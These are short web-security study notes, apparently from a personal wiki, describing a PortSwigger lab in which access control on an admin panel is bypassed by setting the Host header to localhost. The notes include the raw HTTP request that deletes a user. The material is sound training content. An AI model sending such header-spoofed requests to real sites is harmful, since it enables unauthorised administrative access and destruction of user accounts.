Accessing Restricted Functionality

Introduction

For fairly obvious reasons, it is common for websites to restrict access to certain functionality to internal users only. However, some websites' access control features make flawed assumptions that allow you to bypass these restrictions by making simple modifications to the Host header. This can expose an increased attack surface for other exploits.

Authentication Bypass

Send the GET / request to repeater
Add /admin and send the request
Now, change the Host header to localhost
Delete the user carlos

GET /admin/delete?username=carlos HTTP/2

Host: localhost

REFERENCES

https://portswigger.net/web-security/host-header/exploiting#how-to-exploit-the-http-host-header
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection
https://portswigger.net/web-security/host-header/exploiting/lab-host-header-authentication-bypass
https://cyberw1ng.medium.com/20-2-lab-host-header-authentication-bypass-2023-b8094cb78abf

PreviousWeb Cache Poisoning NextWireless Hacking

Last updated 2 months ago